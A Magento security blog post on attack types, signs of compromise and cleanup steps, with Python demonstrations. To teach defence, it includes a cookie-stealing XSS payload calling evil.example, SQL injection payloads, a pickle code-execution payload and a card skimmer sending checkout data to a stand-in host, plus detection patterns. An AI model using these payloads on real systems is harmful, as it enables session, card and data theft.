Top 8 Cyber Resilience Strategies to Safeguard your Magento Store
November 30, 2023
By-
Shyam P

Ecommerce enterprises are thriving, offering customers convenience and worldwide reach. As they grow, so does their exposure to cyber threats. Adobe Commerce and Magento Open Source (formerly Magento Community Edition) are among the most widely deployed ecommerce platforms, and consequently they attract a substantial share of attacks. A successful attack disrupts regular operations and can lead to data breaches, reputational damage and legal consequences for the store owner.

In this blog post, we focus on the Adobe Commerce / Magento Open Source platform.


Types of Attacks

There are many ways an ecommerce platform can be targeted for exploitation. Some of the most common are:


XSS Cyberattacks

Cross-Site Scripting (XSS) is an injection attack in which malicious script (usually JavaScript) ends up in web pages viewed by other users. It occurs when a web application places untrusted data (a product review, a search term, a CMS block edited through a compromised admin account) into a page without encoding it for the context in which it appears. The consequences include data theft, session hijacking and delivery of malware to users; in a store, an XSS payload on the checkout page is one of the ways card-skimming scripts are delivered. Around 40% of the vulnerabilities catalogued for Magento fall into this category.
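The vulnerable rendering beside the hardened one, as an added example that is not code from this page or from Magento. It is plain Python: a stored review is inserted into a template once verbatim and once entity-encoded, and the standard library's HTML parser is used to show which tags a browser would actually see. The review text and the evil.example host are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: what an attacker might submit as a product review.
ATTACKER_REVIEW = (
    "Great product!"
    '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
)


def render_review_vulnerable(text):
    """Stored XSS: the untrusted review text is placed straight into the page."""
    return '<div class="review">' + text + "</div>"


def render_review_safe(text):
    """Same template, but the untrusted value is entity-encoded for HTML element
    content. quote=True also encodes both quote characters, which matters when
    the same helper is reused inside attribute values."""
    return '<div class="review">' + html.escape(text, quote=True) + "</div>"


class _TagCollector(HTMLParser):
    """Records every start tag a browser's parser would see in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []  # (tag name, {attribute: value})

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def has_event_handler(markup):
    """True if any element carries an on* attribute (onerror, onload, ...)."""
    return any(name.startswith("on")
               for _, attrs in parsed_tags(markup) for name in attrs)


if __name__ == "__main__":
    for label, render in (("vulnerable", render_review_vulnerable),
                          ("safe", render_review_safe)):
        out = render(ATTACKER_REVIEW)
        print(label, [t for t, _ in parsed_tags(out)], has_event_handler(out))
```

The encoded version still contains the text "onerror" as visible characters, which is why a substring check is the wrong test; what matters is that no element with an event handler survives parsing.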


Remote Code Execution Attacks

Remote Code Execution (RCE) is the next most common category after XSS, with a 24% share according to CVE Details. In an RCE attack the attacker exploits a flaw in the platform, an extension or the server stack to run code of their choosing on the Magento server, gaining unauthorized access to and control over the system. It is one of the most critical threats a store faces: once an attacker can run code, every other attack on this list (card skimming, rogue admin accounts, backdoors) becomes trivial.


CSRF Attacks

Cross-Site Request Forgery (CSRF) is the next most common attack on Magento stores. The attacker tricks a logged-in user's browser into sending a request the user did not intend, for example through an auto-submitting form on a page the victim visits. CSRF exploits the trust a web application places in an authenticated user's browser: the victim's session cookie is attached automatically to the forged request. If a state-changing request is accepted without a token tied to the user's session (Magento's form_key is such a token), or if a GET request is allowed to change state at all, forging it is straightforward.

CSRF attacks can result in a wide range of consequences, such as changing account settings, unauthorized financial transactions, data modification or deletion, and more.
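A session-bound token check, as an added example that is not code from this page or from Magento. Python stands in for the application: the same "change email" endpoint is shown without protection and with two checks (POST only, and an HMAC token derived from the caller's own session), and four constructed requests are run against each. The server secret, session identifiers and addresses are all assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret kept outside the code base (generated at
# start-up here). Tokens are HMAC(secret, session id), so nothing has to be stored
# per token and a token issued to one session is useless in another.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token to embed as a hidden field in every state-changing form
    (Magento's form_key plays this role)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id, token):
    # Constant-time comparison: a plain == would leak the token via timing.
    return hmac.compare_digest(token, issue_csrf_token(session_id))


def change_email_vulnerable(method, session_id, params):
    """Endpoint with no CSRF protection: any request carrying the session cookie
    is trusted, including one forged by another site. Returns (status, message)."""
    if session_id is None:
        return 401, "not logged in"
    return 200, "email changed to " + params["email"]


def change_email_protected(method, session_id, params):
    """Same endpoint with two checks: state changes only via POST, and the request
    must carry a token bound to the caller's own session."""
    if session_id is None:
        return 401, "not logged in"
    if method != "POST":
        return 405, "state-changing requests must use POST"
    if not token_is_valid(session_id, params.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, "email changed to " + params["email"]


def scenarios(handler):
    """Constructed requests. The browser attaches the victim's session cookie to
    all of them; only the first is one the victim meant to send."""
    victim, attacker = "sess-victim-1234", "sess-attacker-9999"
    return {
        # Legitimate form submitted from the store's own page.
        "legit_post": handler("POST", victim, {
            "email": "me@shop.example", "csrf_token": issue_csrf_token(victim)})[0],
        # Auto-submitting form on evil.example: it cannot read the victim's token.
        "forged_post_no_token": handler("POST", victim, {
            "email": "attacker@evil.example"})[0],
        # Attacker reuses a token that was issued to their own session.
        "forged_post_foreign_token": handler("POST", victim, {
            "email": "attacker@evil.example", "csrf_token": issue_csrf_token(attacker)})[0],
        # <img src="https://shop.example/customer/email?email=..."> in a phishing mail.
        "forged_get": handler("GET", victim, {"email": "attacker@evil.example"})[0],
    }


if __name__ == "__main__":
    print("vulnerable:", scenarios(change_email_vulnerable))
    print("protected: ", scenarios(change_email_protected))
```

Setting the session cookie's SameSite attribute adds a second layer, but the token check is what stops the forged requests above regardless of browser support.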


SQL Injection

In a SQL Injection attack the attacker manipulates the application's input so that part of it is interpreted as SQL (Structured Query Language) by the database. The injected SQL is executed with the application's database privileges, potentially giving the attacker unauthorized access to, or control over, the database and the data it contains. SQL Injection is a common and serious threat, particularly in web applications (and extensions) that build queries by concatenating user input instead of using parameterized queries.
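The injection and the fix side by side, as an added example that is not code from this page or from Magento. It uses Python with an in-memory SQLite stand-in for the customer_entity table (the table name is Magento's; the columns, rows and hashes are constructed) and shows that two classic payloads succeed against a concatenated query and do nothing against a parameterized one.

```python
import sqlite3

# Constructed rows; password hashes are placeholders.
CUSTOMERS = [
    (1, "alice@shop.example", "$2y$10$aliceHashPlaceholder"),
    (2, "bob@shop.example", "$2y$10$bobHashPlaceholder"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer_entity "
                 "(entity_id INTEGER, email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO customer_entity VALUES (?, ?, ?)", CUSTOMERS)
    return conn


def find_customer_vulnerable(conn, email):
    """Query built by string concatenation: the input becomes part of the SQL."""
    sql = "SELECT entity_id, email FROM customer_entity WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def find_customer_safe(conn, email):
    """Parameterized query: the driver sends the value separately, so quotes,
    comments and UNIONs in the input are just characters inside a string."""
    sql = "SELECT entity_id, email FROM customer_entity WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


# Constructed attacker inputs: a tautology and a UNION that dumps another column.
TAUTOLOGY = "x' OR '1'='1"
UNION_DUMP = "' UNION SELECT entity_id, password_hash FROM customer_entity --"


def demo():
    conn = make_db()
    return {
        "vuln_tautology": find_customer_vulnerable(conn, TAUTOLOGY),
        "vuln_union": find_customer_vulnerable(conn, UNION_DUMP),
        "safe_tautology": find_customer_safe(conn, TAUTOLOGY),
        "safe_union": find_customer_safe(conn, UNION_DUMP),
        "safe_legit": find_customer_safe(conn, "alice@shop.example"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable function returns every customer for the tautology and the password hashes for the UNION payload; the parameterized version returns nothing for either and still finds the real address.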


Brute Force Attacks

In a brute force attack the attacker tries to gain access to a system or an account by systematically attempting username and password combinations until one works. To speed this up, attack tools use dictionaries of common passwords or credentials leaked from other breaches (credential stuffing). Brute force is simple and slow but effective against weak passwords, and it is often tried when more sophisticated methods fail. On a Magento store the usual targets are the admin login, the customer login and the API token endpoints; account lockout after repeated failures, a strong password policy and two-factor authentication for admin users are the standard countermeasures.


Silent Card Capture

As the name suggests, the attacker covertly steals payment card data as customers enter it on your checkout page; this is commonly called web skimming or Magecart. The attacker plants a script (in a template, a CMS block, a configuration value or a static file) that copies the card fields as they are typed and either sends them to an attacker-controlled server or writes them to a file on the store's own server, which the attacker collects periodically. The script is usually obfuscated and only runs on the checkout page, so the attack is hard to detect and can go unnoticed for months.

By the time it is discovered, the attacker may already have caused considerable damage to your customers, your brand image and your website.


Carding Attack

In a carding attack, criminals use your store to test stolen credit card numbers and personal information: they place many small orders, and a successful authorization tells them which cards are still valid so they can be used elsewhere. Your website becomes an unwilling participant in the fraud, and it typically also absorbs the chargebacks and gateway fees.


Malicious Redirects

Here the attacker inserts code that redirects visitors to phishing or malware sites, often only for certain referrers, user agents or locations so that the owner and search-engine crawlers still see the normal site; the compromised URLs may also be advertised in spam emails. Showing crawlers content other than what users see (cloaking) is against Google's webmaster guidelines, so the consequences for an ecommerce business are severe: loss of search ranking, blacklisting, loss of customer trust and a damaged reputation.


XXE Attacks

An XML External Entity (XXE) attack (sometimes called an XXE injection attack) is a type of attack that abuses a widely available but rarely used feature of XML parsers. Using XXE, an attacker can cause Denial of Service (DoS) as well as access local and remote content and services. XXE can be used to perform Server Side Request Forgery (SSRF) inducing the web application to make requests to other applications. In some cases, XXE may even enable port scanning and lead to remote code execution.


Deserialization 

Insecure deserialization occurs when an application rebuilds objects from serialized data it received from an untrusted source (PHP's serialize()/unserialize() format, Java objects, Python pickles) and trusts that data without validation. Deserialization is the process of converting serialized data back into live objects, and in most languages the serialized stream names the classes to instantiate and their properties; an attacker who controls the stream can chain existing application code into remote code execution or unauthorized access to sensitive data.

It is a critical issue with severe consequences. The fix is to avoid native object deserialization of untrusted input altogether (use a plain data format such as JSON) or, where that is unavoidable, to restrict which classes may be instantiated.
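The attack and both fixes, as an added example that is not code from this page or from Magento. Python's pickle stands in for PHP's unserialize: the constructed payload asks the loader to call the built-in open() on a marker file (a stand-in for dropping a web shell), the naive loader does it, and a restricted unpickler refuses while still loading ordinary data. The marker path and the allow-list contents are assumptions for the demonstration.

```python
import io
import json
import os
import pickle
import tempfile

# Path the constructed payload writes to when it is deserialized.
MARKER = os.path.join(tempfile.gettempdir(), "deserialization-demo-%d" % os.getpid())


class Malicious:
    """Attacker-side class. Pickle serializes what __reduce__ returns: a callable
    and its arguments, which the receiving side calls during loading. The class
    itself never needs to exist on the victim."""

    def __reduce__(self):
        return (open, (MARKER, "w"))


def build_payload():
    return pickle.dumps(Malicious())


def load_vulnerable(blob):
    """pickle.loads on untrusted data runs whatever the stream asks for."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened form: only explicitly listed classes may be resolved. Anything
    else (io.open, os.system, subprocess.Popen, ...) is refused."""

    ALLOWED = {("collections", "OrderedDict")}  # assumption: what this app needs

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("refusing to load %s.%s" % (module, name))


def load_restricted(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def load_as_data(text):
    """Preferred fix for plain data: a format that cannot name classes at all."""
    return json.loads(text)


def _reset():
    if os.path.exists(MARKER):
        os.remove(MARKER)


def demo_vulnerable():
    """True if deserializing the payload created the marker file."""
    _reset()
    obj = load_vulnerable(build_payload())
    if hasattr(obj, "close"):
        obj.close()
    created = os.path.exists(MARKER)
    _reset()
    return created


def demo_restricted():
    """(payload refused, marker created, legitimate data still round-trips)."""
    _reset()
    try:
        load_restricted(build_payload())
        refused = False
    except pickle.UnpicklingError:
        refused = True
    created = os.path.exists(MARKER)
    _reset()
    legit = {"cart": [101, 205], "coupon": "SPRING"}
    roundtrip = load_restricted(pickle.dumps(legit)) == legit
    return refused, created, roundtrip


if __name__ == "__main__":
    print("vulnerable loader created file:", demo_vulnerable())
    print("restricted loader (refused, created, roundtrip):", demo_restricted())
```

The allow-list approach works because dictionaries, lists and strings are encoded with dedicated opcodes and never go through find_class; only class and function references do, which is exactly where the attacker's reach comes from.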


Symptoms of a Hacked Store

The following are some of the tell-tale signs that the site has been hacked.


Web store unavailability 

  • Your hosting provider suspends the site for malicious activity.
  • Browsers or Google Safe Browsing flag or block the site.
  • Visitors are redirected to other sites or see unwanted pop-up ads.
  • The home page has been defaced or blanked out.
  • Unauthorized or unrecognized modifications to the site's content: added or altered pages, links or text.


Administration panel and content issues

  • Unauthorized administrator accounts, or existing accounts whose email address or role has changed.
  • Inability to log in to the admin panel or to use some of its functions.
  • Unauthorized changes to website files, including inserted malicious scripts.
  • Loss of email reputation (your domain's mail lands in spam), which may mean the server is sending spam.


Poor performance

  • The site becomes slow and errors appear that no deployment explains.
  • Unknown or unrecognized processes running in the background.
  • A sudden, unexplained surge in traffic.
  • Unusual server resource consumption: malicious scripts (spam mailers, crypto miners, card-testing bots) consume CPU, memory and bandwidth.

Reported data theft

  • Customers complain that card details they used only on your store have been misused.
  • Extra fields on the checkout form, or customers charged amounts they did not authorize.
  • Unexplained changes in Magento files and folders.


Increased cart abandonment, or a broken / altered checkout

  • The checkout page loads additional scripts that steal data or money.
  • A noticeable increase in cart abandonment (customers hit errors or are redirected mid-checkout).
  • The payment step behaves suspiciously, for example asking for card details twice.

Search Engine Penalties

  • Penalties from search engines, causing a drop in search rankings.
  • Unauthorized SEO changes, including added links, keywords or hidden text for black-hat SEO purposes.
  • The store is no longer being crawled or indexed.


Hacked, What’s Next?

Once it is clear that the site has been hacked, what comes next? Because we do not yet know how the hack happened, the following steps need to be performed in order. Many online tools can help, but it is best to involve a Magento expert: the immediate need is to contain the attack, clean the site and get back to normal business, without destroying the evidence needed to find the root cause.


Step 1: Secure the site

Change the credentials for every account used to administer the site (customer accounts are not included at this stage): Magento admin accounts, SFTP/SSH accounts, Linux user accounts and MySQL credentials. Also revoke and re-issue API integration tokens and rotate any payment-gateway or third-party API keys stored in the configuration. This is the first step to limit the damage, and it must happen before the clean-up, otherwise the attacker simply logs back in.


Step 2: Backup and Investigate

Create a backup of the site in its current state (files, database and logs: web server, PHP, Magento's var/log and MySQL logs) before changing anything, and store it off the compromised host, so that a deeper analysis can be done later. If needed, forensic scans can be run on the backup image rather than on the live system.


Step 3: Initiate Security Scans

Initiate a security scan so that we know what gaps exist right now. A scanner provides a list of weaknesses that need to be closed; note that external scanners only see what is exposed to the internet, so they complement rather than replace the file and database review in the following steps. The following are some of the popular scanners on the market.

Adobe Scan

Adobe provides a Security Scan Tool that checks a site for known vulnerabilities and missing patches and alerts you to the patches that are needed. See https://experienceleague.adobe.com/docs/commerce-admin/systems/security/security-scan.html for details. It is free and works for both Adobe Commerce and Magento Open Source sites, but it requires signing in with a Commerce account and verifying ownership of the domain.

Magereport

Magereport is another site that scans a Magento store for known vulnerabilities and makes recommendations. It is a free tool. It validates against Magento core and well-known patches, not against any custom code that has been written.

Sucuri

Sucuri SiteCheck is a generic website scanner, useful for a quick check of the site against common online threats such as known malware, blacklisting and outdated software.

Foregenix

Foregenix offers an external scan that tests for common Magento weaknesses and provides a high-level report.

Security Patch Tester

Patch Tester checks whether the Magento store is vulnerable to the latest known security issues by probing for missing security patches.

Mage Scan

Mage Scan is a command-line tool rather than a hosted service: you run it yourself, so it can also test a Magento site on an intranet that the online scanners cannot reach.

Acunetix

Acunetix is an enterprise web vulnerability scanner that does not slow the site down during a scan. It covers not only Magento-specific checks but the whole website, and it can produce PCI DSS, HIPAA and OWASP Top 10 reports if needed.


Step 4: User logs

Next, audit the users on your site. Attackers who gain access often add an administrator account for themselves so that they can return later. Review the admin_user table (and the user list in the admin panel) for accounts you do not recognize, for legitimate accounts whose email address or role has changed, and for unexpected API integrations; remove or disable rogue entries and record their details for the investigation.


Step 5: Check known attack vectors

There are many vectors for attacks. At the outset we should check the core files.

config.php and env.php 

app/etc/config.php and app/etc/env.php make up the Magento 2 deployment configuration. env.php holds the system-specific settings: the database connection credentials, the encryption key (crypt/key), the table prefix, the admin URL front name, and cache, session and queue settings. config.php is generated by Magento and lists the enabled modules, themes and language packs together with shared configuration. Things to check:

  • env.php for a changed database host or credentials pointing somewhere you do not control.
  • Both files for modules you did not install and for any PHP that is not a plain array return.
  • Both files against the copies in version control or a known-good backup.

index.php

Attackers frequently modify index.php (in pub/ and in the web root), typically by prepending encoded or obfuscated code, because it runs on every request. Keep a known-good copy and compare; restoring it from backup removes that foothold, but not the way it was planted.

.htaccess

Apache reads configuration from .htaccess files, which let a site override settings from httpd.conf/apache2.conf on a per-directory basis. Magento ships .htaccess files that, among other things:

  • Block web access to directories that must not be served directly (app/, var/, vendor/ and others).
  • Create redirections for the store.
  • Force HTTPS.
  • Block some injection attacks by rejecting dangerous request patterns.
  • Block known bad bots by user agent, including those used for username enumeration.
  • Prevent image hotlinking.
  • Force downloads for certain file types.

Because the file is so powerful, an attacker who can write to it can turn it against the store: injected rewrite rules redirect visitors to malicious sites, serve different content to search-engine crawlers, or expose directories that were blocked. Compare every .htaccess in the tree against the shipped version, not only the one in the web root.

core_config_data table

In addition to the files above, Magento stores most of its configuration in the core_config_data table. Take a backup of the table and compare it with the known entries, paying particular attention to values that are rendered as HTML or JavaScript (the head "Scripts and Style Sheets", the footer "Miscellaneous HTML", the shipping policy and similar). Mark suspicious entries for analysis and revert them to the original values. In the example below, the injected code was hidden in the Shipping Policy entry: the text area in the admin panel appears empty because the payload sits after a long run of whitespace, and it only becomes visible when the field is expanded or the raw value is read from the database.

[Screenshot: the Shipping Policy configuration entry with injected code hidden below a block of whitespace]


CMS tables

Check the database for unknown or unrecognized changes to static blocks, pages and blog posts. The relevant tables are cms_block and cms_page; look for script and iframe tags, external URLs you do not recognize, and content appended after the visible text.
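A scan over configuration and CMS values that covers both the core_config_data review above and the cms_block / cms_page check, as an added example that is not code from this page or from Magento. It is plain Python over rows that are constructed inline (the config paths are Magento's, the values are made up): values that may legitimately contain HTML are checked for obfuscation markers, iframes and unknown hosts, plain values are flagged for containing any markup at all, and the whitespace-hiding trick from the screenshot is detected separately. The list of known hosts is an assumption a merchant would replace with their own.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the merchant knowingly loads content from.
KNOWN_HOSTS = {"shop.example", "static.shop.example", "www.googletagmanager.com"}

# Paths whose values legitimately contain HTML/JS, plus the CMS tables. Any other
# path is a plain value in which markup of any kind is suspicious.
HTML_ALLOWED_PREFIXES = ("design/head/includes", "design/footer/",
                         "shipping/shipping_policy/", "cms_block/", "cms_page/")

OBFUSCATION = re.compile(
    r"\beval\s*\(|\batob\s*\(|fromCharCode|document\.write|\bunescape\s*\(|"
    r"base64_decode|(?:\\x[0-9a-fA-F]{2}){4,}", re.I)
ALWAYS_SUSPECT = re.compile(r"<iframe\b|javascript:", re.I)
ANY_TAG = re.compile(r"<[a-zA-Z][^>]*>")
URL_IN_ATTR = re.compile(r"""(?:src|href|action)\s*=\s*["']?(https?://[^"'\s>]+)""", re.I)
HIDDEN_AFTER_WHITESPACE = re.compile(r"[ \t\r\n]{100,}\S")


def scan_value(path, value):
    """Return finding labels for one configuration or CMS value."""
    findings = []
    if not path.startswith(HTML_ALLOWED_PREFIXES) and ANY_TAG.search(value):
        findings.append("markup-in-plain-field")
    if OBFUSCATION.search(value):
        findings.append("obfuscation")
    if ALWAYS_SUSPECT.search(value):
        findings.append("iframe-or-javascript-url")
    for url in URL_IN_ATTR.findall(value):
        host = urlparse(url).hostname or url
        if host not in KNOWN_HOSTS:
            findings.append("unknown-host:" + host)
    if HIDDEN_AFTER_WHITESPACE.search(value):
        findings.append("hidden-after-whitespace")
    return findings


def scan_rows(rows):
    """rows: iterable of (label, path, value); label identifies the row
    (table and id), path is the config path or 'table/identifier' for CMS rows."""
    return {label: scan_value(path, value) for label, path, value in rows}


# Constructed rows as they might come out of a database dump.
SAMPLE_ROWS = [
    ("core_config_data#1", "design/head/includes",
     '<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABC123"></script>'),
    ("core_config_data#2", "design/head/includes",
     '<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABC123"></script>\n'
     + " " * 300 + '<script>eval(atob("BASE64-PAYLOAD-PLACEHOLDER"))</script>'),
    ("core_config_data#3", "shipping/shipping_policy/shipping_policy_content",
     "<p>Free shipping on orders over $50.</p>"),
    ("core_config_data#4", "web/unsecure/base_url", "https://shop.example/"),
    ("core_config_data#5", "general/store_information/name",
     'Example Shop<script src="https://cdn-stats.example.net/a.js"></script>'),
    ("cms_block#6", "cms_block/footer_links",
     '<ul><li><a href="https://shop.example/contact">Contact</a></li></ul>'),
    ("cms_block#7", "cms_block/checkout_promo",
     '<div>10% off today</div>'
     '<iframe src="https://pay-secure.example.org/f" style="display:none"></iframe>'),
]


if __name__ == "__main__":
    for label, findings in scan_rows(SAMPLE_ROWS).items():
        if findings:
            print(label, findings)
```

Rows 1, 3, 4 and 6 produce nothing; the tag-manager include, the shipping text, the base URL and a footer link to the store's own domain are what a clean store looks like. Everything the scan does flag still needs a human decision, but it reduces thousands of rows to a handful worth reading.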

New files

We often find files that are not normally present. Search for new and recently modified files across the whole tree, and do not restrict the search to script extensions: some backdoors are hidden in image files, so a seemingly harmless "png" or "webp" file can contain PHP that runs when another injected file includes it or when the web server is misconfigured to execute it.

Regenerate static folder

Run the deployment commands so that the static files under pub/static (and the generated code under generated/) are rebuilt from source. It is better to delete those folders first, so that nothing an attacker dropped there survives the rebuild.

Check on outbound requests

Depending on the affected area, open the browser's developer tools (Network tab) on the checkout and payment pages and review every outbound request the page makes. Any request to a domain you do not recognize must be traced to its origin in the code or database, and the domain should be blocked at the firewall or by the hosting provider while it is investigated. Note that skimmers often fire only when the order is submitted, and some check the referrer or user agent, so test with a realistic session rather than a plain page load.
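An offline version of the outbound-request review that also covers the silent card capture described under Types of Attacks, as an added example that is not code from this page or from Magento. Plain Python parses a saved checkout page, collects every script, image, iframe, form and link target plus every inline script, and reports hosts outside an allow-list; inline scripts are additionally searched for URLs hidden in base64 string literals, which is how skimmers commonly conceal their collection server. The checkout page, the allow-list and the collect.example.org host are all constructed for the demonstration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a checkout page is expected to talk to (the store, its static
# host, the tag manager and the payment gateway's script host).
ALLOWED_HOSTS = {"shop.example", "static.shop.example",
                 "www.googletagmanager.com", "js.gateway.example"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"<>)]*)?")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
EXFIL_MARKERS = re.compile(r"\batob\s*\(|\bbtoa\s*\(|String\.fromCharCode|\bunescape\s*\(")


class OutboundCollector(HTMLParser):
    """Collects every place the page can reach out from."""

    def __init__(self):
        super().__init__()
        self.urls = []            # (element, url)
        self.inline_scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag in ("script", "img", "iframe", "form", "link"):
            for attr in ("src", "href", "action"):
                if a.get(attr):
                    self.urls.append((tag, a[attr]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data)


def urls_in_inline_script(js):
    """Literal URLs plus URLs hidden inside base64 string literals."""
    found = set(URL_RE.findall(js))
    for tok in B64_RE.findall(js):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("ascii")
        except Exception:
            continue  # not really base64, or not text
        found.update(URL_RE.findall(decoded))
    return found


def audit_checkout_html(html_text):
    p = OutboundCollector()
    p.feed(html_text)
    p.close()
    unknown = {}
    for element, url in p.urls:
        host = urlparse(url).hostname
        if host and host not in ALLOWED_HOSTS:
            unknown.setdefault(host, []).append(element)
    suspicious_inline = []
    for js in p.inline_scripts:
        hosts = {urlparse(u).hostname for u in urls_in_inline_script(js)} - ALLOWED_HOSTS
        markers = sorted({m.group(0) for m in EXFIL_MARKERS.finditer(js)})
        if hosts or markers:
            suspicious_inline.append({"hosts": sorted(hosts), "markers": markers})
        for h in hosts:
            unknown.setdefault(h, []).append("inline-script")
    return {"unknown_hosts": unknown, "suspicious_inline": suspicious_inline}


# Constructed checkout page: one rogue external script, one hidden iframe and a
# skimmer that decodes its collection URL from base64 at run time.
EXFIL_B64 = base64.b64encode(b"https://collect.example.org/gate.php").decode()
SAMPLE_CHECKOUT = f"""<html><head>
<link rel="stylesheet" href="https://static.shop.example/css/styles.css">
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABC123"></script>
<script src="https://js.gateway.example/v3/client.js"></script>
<script src="https://cdn.js-analytics.example/jquery.min.js"></script>
</head><body>
<form id="checkout" action="https://shop.example/checkout/place" method="post">
<input name="cc_number"><input name="cc_cvv"><button>Pay</button></form>
<script>window.checkoutConfig = {{"storeCode": "default"}};</script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {{
  var d = new FormData(this), i = new Image();
  i.src = atob('{EXFIL_B64}') + '?d=' + btoa(JSON.stringify(Object.fromEntries(d)));
}});
</script>
<iframe src="https://pay-secure.example.org/frame" style="display:none"></iframe>
</body></html>"""


if __name__ == "__main__":
    print(audit_checkout_html(SAMPLE_CHECKOUT))
```

Run it over the page saved from a real checkout session (after submitting an order, since the skimmer's request may not appear before that) and treat every unknown host as something to trace back to a file or database row.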

Obfuscated code

Check the code base and the database for obfuscated code: long base64 strings, calls to eval, base64_decode, gzinflate, str_rot13 or assert, hex-escaped JavaScript, and PHP in files that should not contain any. phpMyAdmin or the mysql client can be used to search the database tables for the same patterns.

Client session reviews

If you subscribe to a session-recording service such as Hotjar or Noibu, review recorded customer sessions on the checkout. They show the exact behaviour customers experienced and which JavaScript files were involved.


Step 6: Compare Files

Compare the files present on the site with a clean copy, which is usually available from the git repository or from a backup that predates the infection. Any file that differs must be investigated and a determination made; theme files and vendor code that were edited in place rather than through Composer are typical examples. Generated directories (pub/static, generated/, var/) are rebuilt anyway, so exclude them from the comparison.


Step 7: Release

Once the infection or malware has been cleaned out, smoke test the critical path (browse, add to cart, checkout, admin login) to make sure the clean-up has not broken the site's functionality, and only then release the site.


Step 8: Audit

Now that the immediate threat has been resolved, we suggest a complete security audit of the site by Magento experts who understand the security aspects of the platform; the typical Magento developer is not focused on security.
The audit provides a list of gaps and the corresponding fixes. Apply all security patches, update extensions and keep the system patched from then on; otherwise the same entry point will be used again.


Build a Cyber-Resilient Future with Kensium

In the continuously evolving cyber threat landscape, organizations should prioritize cyber resilience to safeguard their operations. Protecting an ecommerce store requires a comprehensive approach to cybersecurity. Kensium helps you leverage Adobe Commerce, formerly known as Magento, to scale your business and maximize operational efficiency. Our Maintenance Support Services team performs monthly monitoring and reporting and recommends best practices to protect your Magento store from cyber threats. With training provided by Kensium experts you can bolster your organization's digital defenses, build a resilient future, and ensure a secure and thriving ecommerce store.

Take proactive steps towards safeguarding your ecommerce business’s cyber resilience by scheduling a call today.

Schedule a Call


Shyam Pandey is a seasoned IT professional with over 24 years of experience across strategy planning, project management, solution architecture, and IT consulting. At Kensium, he leads the architecture and design of complex technology solutions, specializing in ERP and ecommerce platforms. Shyam mentors a team of solution architects, fostering innovation and collaboration while ensuring solutions meet business goals and quality standards.